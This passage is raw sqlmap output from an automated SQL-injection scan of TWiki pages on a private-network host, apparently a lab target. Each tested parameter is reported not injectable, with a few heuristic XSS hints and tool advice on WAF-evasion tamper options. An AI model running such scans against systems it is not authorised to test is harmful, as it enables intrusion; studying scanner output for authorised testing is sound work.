[20:06:07] [WARNING] GET parameter 't' is not injectable | |
[20:06:07] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 163: | |
GET http://192.168.1.113:80/twiki/bin/search/Know/SearchResult?scope=text®ex=on&search=Web *Preferences[^A-Za-z] | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:06:07] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/Know/SearchResult?scope=text®ex=on&search=Web *Preferences[^A-Za-z]' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[20:06:07] [INFO] testing connection to the target URL | |
[20:06:08] [INFO] testing if the target URL is stable | |
[20:06:08] [INFO] target URL is stable | |
[20:06:08] [INFO] testing if URI parameter '#1*' is dynamic | |
[20:06:09] [INFO] confirming that URI parameter '#1*' is dynamic | |
[20:06:09] [INFO] URI parameter '#1*' is dynamic | |
[20:06:09] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[20:06:09] [INFO] testing for SQL injection on URI parameter '#1*' | |
[20:06:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:06:09] [WARNING] reflective value(s) found and filtering out | |
[20:06:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:06:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:06:11] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:06:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:06:12] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:06:12] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:06:12] [INFO] testing 'MySQL inline queries' | |
[20:06:13] [INFO] testing 'PostgreSQL inline queries' | |
[20:06:13] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:06:13] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:06:13] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:06:14] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:06:14] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:06:14] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:06:15] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:06:15] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:06:16] [INFO] testing 'Oracle AND time-based blind' | |
[20:06:16] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:06:16] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:06:22] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:06:27] [WARNING] URI parameter '#1*' is not injectable | |
[20:06:27] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 164: | |
GET http://192.168.1.113:80/twiki/bin/view/Know/WebPreferences?skin=print | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:06:27] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Know/WebPreferences?skin=print' | |
[20:06:27] [INFO] testing connection to the target URL | |
[20:06:27] [INFO] testing if the target URL is stable | |
[20:06:28] [INFO] target URL is stable | |
[20:06:28] [INFO] testing if GET parameter 'skin' is dynamic | |
[20:06:28] [INFO] confirming that GET parameter 'skin' is dynamic | |
[20:06:29] [INFO] GET parameter 'skin' is dynamic | |
[20:06:29] [INFO] heuristics detected web page charset 'ascii' | |
[20:06:29] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable | |
[20:06:29] [INFO] testing for SQL injection on GET parameter 'skin' | |
[20:06:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:06:29] [WARNING] reflective value(s) found and filtering out | |
[20:06:30] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:06:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:06:31] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:06:31] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:06:32] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:06:32] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:06:32] [INFO] testing 'MySQL inline queries' | |
[20:06:32] [INFO] testing 'PostgreSQL inline queries' | |
[20:06:33] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:06:33] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:06:33] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:06:34] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:06:34] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:06:34] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:06:35] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:06:35] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:06:36] [INFO] testing 'Oracle AND time-based blind' | |
[20:06:36] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:06:36] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:06:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:06:48] [WARNING] GET parameter 'skin' is not injectable | |
[20:06:48] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 165: | |
GET http://192.168.1.113:80/twiki/bin/rdiff/Know/WebPreferences?rev1=1.12&rev2=1.11 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:06:48] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/Know/WebPreferences?rev1=1.12&rev2=1.11' | |
[20:06:48] [INFO] testing connection to the target URL | |
[20:06:48] [INFO] testing if the target URL is stable | |
[20:06:49] [INFO] target URL is stable | |
[20:06:49] [INFO] testing if GET parameter 'rev1' is dynamic | |
[20:06:49] [WARNING] GET parameter 'rev1' does not appear dynamic | |
[20:06:49] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable | |
[20:06:49] [INFO] testing for SQL injection on GET parameter 'rev1' | |
[20:06:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:06:50] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:06:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:06:51] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:06:51] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:06:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:06:52] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:06:53] [INFO] testing 'MySQL inline queries' | |
[20:06:53] [INFO] testing 'PostgreSQL inline queries' | |
[20:06:53] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:06:53] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:06:53] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:06:54] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:06:54] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:06:55] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:06:55] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:06:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:06:56] [INFO] testing 'Oracle AND time-based blind' | |
[20:06:57] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:06:57] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:07:03] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:07:09] [WARNING] GET parameter 'rev1' is not injectable | |
[20:07:09] [INFO] testing if GET parameter 'rev2' is dynamic | |
[20:07:09] [WARNING] GET parameter 'rev2' does not appear dynamic | |
[20:07:09] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable | |
[20:07:09] [INFO] testing for SQL injection on GET parameter 'rev2' | |
[20:07:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:07:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:07:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:07:11] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:07:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:07:12] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:07:13] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:07:13] [INFO] testing 'MySQL inline queries' | |
[20:07:13] [INFO] testing 'PostgreSQL inline queries' | |
[20:07:13] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:07:14] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:07:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:07:14] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:07:15] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:07:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:07:16] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:07:16] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:07:17] [INFO] testing 'Oracle AND time-based blind' | |
[20:07:17] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:07:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:07:30] [WARNING] GET parameter 'rev2' is not injectable | |
[20:07:30] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 166: | |
GET http://192.168.1.113:80/twiki/bin/view/Know/WebPreferences?rev=1.11 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:07:30] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Know/WebPreferences?rev=1.11' | |
[20:07:30] [INFO] testing connection to the target URL | |
[20:07:30] [INFO] testing if the target URL is stable | |
[20:07:31] [INFO] target URL is stable | |
[20:07:31] [INFO] testing if GET parameter 'rev' is dynamic | |
[20:07:31] [WARNING] GET parameter 'rev' does not appear dynamic | |
[20:07:31] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable | |
[20:07:31] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks | |
[20:07:31] [INFO] testing for SQL injection on GET parameter 'rev' | |
[20:07:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:07:32] [WARNING] reflective value(s) found and filtering out | |
[20:07:33] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:07:33] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:07:34] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:07:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:07:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:07:35] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:07:35] [INFO] testing 'MySQL inline queries' | |
[20:07:36] [INFO] testing 'PostgreSQL inline queries' | |
[20:07:36] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:07:36] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:07:36] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:07:37] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:07:37] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:07:38] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:07:38] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:07:39] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:07:39] [INFO] testing 'Oracle AND time-based blind' | |
[20:07:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:07:40] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:07:46] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:07:52] [WARNING] GET parameter 'rev' is not injectable | |
[20:07:52] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[20:07:52] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Know/WebPreferences?rev1=1.11&rev2=1.10' | |
[20:07:52] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Know/WebPreferences?rev=1.10' | |
URL 167: | |
GET http://192.168.1.113:80/twiki/bin/oops/Know/WebPreferences?template=oopsmore¶m1=1.12¶m2=1.12 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:07:52] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/Know/WebPreferences?template=oopsmore¶m1=1.12¶m2=1.12' | |
[20:07:52] [INFO] testing connection to the target URL | |
[20:07:53] [INFO] testing if the target URL is stable | |
[20:07:53] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on | |
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C | |
[20:07:53] [INFO] testing if GET parameter 'template' is dynamic | |
[20:07:53] [INFO] confirming that GET parameter 'template' is dynamic | |
[20:07:54] [INFO] GET parameter 'template' is dynamic | |
[20:07:54] [INFO] heuristics detected web page charset 'ascii' | |
[20:07:54] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable | |
[20:07:54] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks | |
[20:07:54] [INFO] testing for SQL injection on GET parameter 'template' | |
[20:07:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:07:54] [WARNING] reflective value(s) found and filtering out | |
[20:07:55] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:07:55] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:07:55] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:07:56] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:07:56] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:07:57] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:07:57] [INFO] testing 'MySQL inline queries' | |
[20:07:57] [INFO] testing 'PostgreSQL inline queries' | |
[20:07:57] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:07:57] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:07:57] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:07:58] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:07:58] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:07:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:07:59] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:07:59] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:08:00] [INFO] testing 'Oracle AND time-based blind' | |
[20:08:00] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:08:00] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:08:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:08:09] [WARNING] GET parameter 'template' is not injectable | |
[20:08:09] [INFO] testing if GET parameter 'param1' is dynamic | |
[20:08:09] [WARNING] GET parameter 'param1' does not appear dynamic | |
[20:08:10] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable | |
[20:08:10] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks | |
[20:08:10] [INFO] testing for SQL injection on GET parameter 'param1' | |
[20:08:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:08:11] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:08:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:08:12] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:08:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:08:13] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:08:13] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:08:13] [INFO] testing 'MySQL inline queries' | |
[20:08:13] [INFO] testing 'PostgreSQL inline queries' | |
[20:08:14] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:08:14] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:08:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:08:15] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:08:15] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:08:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:08:16] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:08:17] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:08:17] [INFO] testing 'Oracle AND time-based blind' | |
[20:08:18] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:08:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:08:30] [WARNING] GET parameter 'param1' is not injectable | |
[20:08:30] [INFO] testing if GET parameter 'param2' is dynamic | |
[20:08:30] [WARNING] GET parameter 'param2' does not appear dynamic | |
[20:08:30] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable | |
[20:08:30] [INFO] testing for SQL injection on GET parameter 'param2' | |
[20:08:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:08:32] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:08:32] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:08:32] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:08:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:08:34] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:08:34] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:08:34] [INFO] testing 'MySQL inline queries' | |
[20:08:34] [INFO] testing 'PostgreSQL inline queries' | |
[20:08:34] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:08:35] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:08:35] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:08:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:08:36] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:08:36] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:08:37] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:08:37] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:08:38] [INFO] testing 'Oracle AND time-based blind' | |
[20:08:38] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:08:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:08:51] [WARNING] GET parameter 'param2' is not injectable | |
[20:08:51] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 168: | |
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/WebHome?t=1441457699 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:08:51] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/WebHome?t=1441457699' | |
[20:08:51] [INFO] testing connection to the target URL | |
[20:08:51] [INFO] testing if the target URL is stable | |
[20:08:52] [INFO] target URL is stable | |
[20:08:52] [INFO] testing if GET parameter 't' is dynamic | |
[20:08:52] [WARNING] GET parameter 't' does not appear dynamic | |
[20:08:52] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable | |
[20:08:52] [INFO] testing for SQL injection on GET parameter 't' | |
[20:08:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:08:53] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:08:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:08:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:08:55] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:08:55] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:08:56] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:08:56] [INFO] testing 'MySQL inline queries' | |
[20:08:56] [INFO] testing 'PostgreSQL inline queries' | |
[20:08:56] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:08:56] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:08:57] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:08:57] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:08:57] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:08:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:08:58] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:08:59] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:08:59] [INFO] testing 'Oracle AND time-based blind' | |
[20:09:00] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:09:00] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:09:06] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:09:12] [WARNING] GET parameter 't' is not injectable | |
[20:09:12] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 169: | |
GET http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text®ex=on&search=Web *Home[^A-Za-z] | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:09:12] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text®ex=on&search=Web *Home[^A-Za-z]' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[20:09:12] [INFO] testing connection to the target URL | |
[20:09:12] [INFO] testing if the target URL is stable | |
[20:09:13] [INFO] target URL is stable | |
[20:09:13] [INFO] testing if URI parameter '#1*' is dynamic | |
[20:09:13] [INFO] confirming that URI parameter '#1*' is dynamic | |
[20:09:13] [INFO] URI parameter '#1*' is dynamic | |
[20:09:13] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[20:09:14] [INFO] testing for SQL injection on URI parameter '#1*' | |
[20:09:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:09:14] [WARNING] reflective value(s) found and filtering out | |
[20:09:15] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:09:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:09:16] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:09:17] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:09:17] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:09:18] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:09:18] [INFO] testing 'MySQL inline queries' | |
[20:09:18] [INFO] testing 'PostgreSQL inline queries' | |
[20:09:18] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:09:18] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:09:19] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:09:19] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:09:20] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:09:20] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:09:20] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:09:21] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:09:22] [INFO] testing 'Oracle AND time-based blind' | |
[20:09:22] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:09:22] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:09:28] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:09:33] [WARNING] URI parameter '#1*' is not injectable | |
[20:09:33] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 170: | |
GET http://192.168.1.113:80/twiki/bin/view/TWiki/WebHome?skin=print | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:09:33] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/WebHome?skin=print' | |
[20:09:33] [INFO] testing connection to the target URL | |
[20:09:33] [INFO] testing if the target URL is stable | |
[20:09:34] [INFO] target URL is stable | |
[20:09:34] [INFO] testing if GET parameter 'skin' is dynamic | |
[20:09:34] [INFO] confirming that GET parameter 'skin' is dynamic | |
[20:09:34] [INFO] GET parameter 'skin' is dynamic | |
[20:09:34] [INFO] heuristics detected web page charset 'ascii' | |
[20:09:34] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable | |
[20:09:35] [INFO] testing for SQL injection on GET parameter 'skin' | |
[20:09:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:09:35] [WARNING] reflective value(s) found and filtering out | |
[20:09:36] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
